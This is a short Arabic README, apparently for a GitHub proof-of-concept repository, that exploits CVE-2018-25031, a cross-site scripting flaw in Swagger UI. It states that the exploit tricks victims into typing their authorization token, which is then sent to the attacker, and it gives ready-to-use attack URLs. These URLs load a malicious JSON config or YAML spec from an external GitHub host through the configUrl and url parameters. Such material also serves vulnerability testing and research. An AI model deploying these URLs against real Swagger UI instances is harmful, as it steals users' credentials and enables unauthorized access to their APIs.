
إثبات مفهوم استغلال لثغرة CVE-2018-25031 (XSS في Swagger UI) التي تسرق رموز التفويض عبر معاملات configUrl/url المصممة.
POC بسيط (CVE-2018-25031) يخدع الضحية لإدخال رمز التفويض، والذي يتم إرساله بعد ذلك إلى المهاجم.
يمكنك استخدامه مع ثغرة XSS https://github.com/VictorNS69/swagger-ui-xss
من الضروري العثور على المعامل وتعيين الملف الصحيح: بالنسبة لـ configUrl، ملف JSON، وبالنسبة لـ url، ملف YAML.
https://<URL>/?configUrl=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.json
https://<URL>/?url=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.yaml
https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://github.com/mathis2001/CVE-2018-25031